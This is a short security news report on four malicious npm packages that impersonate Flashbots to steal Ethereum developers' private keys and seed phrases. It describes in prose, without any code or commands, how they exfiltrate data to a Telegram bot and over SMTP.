Malicious npm Packages Imitate Flashbots to Steal Ethereum Wallet Keys

A new set of four malicious packages has been discovered in the NPM package registry, designed to steal cryptocurrency wallet credentials from Ethereum developers. These packages masquerade as legitimate cryptographic utilities and Flashbots MEV infrastructure while secretly exfiltrating private keys and mnemonic seeds to a Telegram bot controlled by the threat actor. Socket researcher Kush Pandya highlighted that the packages were uploaded by a user named “Flashbotts,” with the earliest library appearing in September 2023 and the most recent upload on August 19, 2025. The identified packages include @Flashbotts/Ethers-Provider-Bundle, Flashbot-SDK-Eth, SDK-Ethers, and Gram-Utilz, all of which remain available for download.

The impersonation of Flashbots is particularly concerning due to its role in mitigating the adverse effects of Maximal Extractable Value (MEV) on the Ethereum network. The most dangerous package, @Flashbotts/Ethers-Provider-Bundle, conceals malicious operations under the guise of offering full Flashbots API compatibility. This package exfiltrates environment variables over SMTP using Mailtrap and manipulates transactions to redirect unsigned transactions to an attacker-controlled wallet. While SDK-Ethers is mostly benign, it includes functions that can transmit mnemonic seed phrases to a Telegram bot when invoked by unsuspecting developers. The presence of Vietnamese language comments in the source code suggests that the financially motivated threat actor may be Vietnamese-speaking, indicating a deliberate effort to exploit the trust associated with the platform for software supply chain attacks. 

Categories: Malicious Packages, Cryptocurrency Theft, Software Supply Chain Attacks 

Tags: Malicious Packages, npm Registry, Cryptocurrency Theft, Ethereum Developers, Flashbots, Private Keys, Mnemonic Seeds, Telegram Bot, Software Supply Chain, Trust Exploitation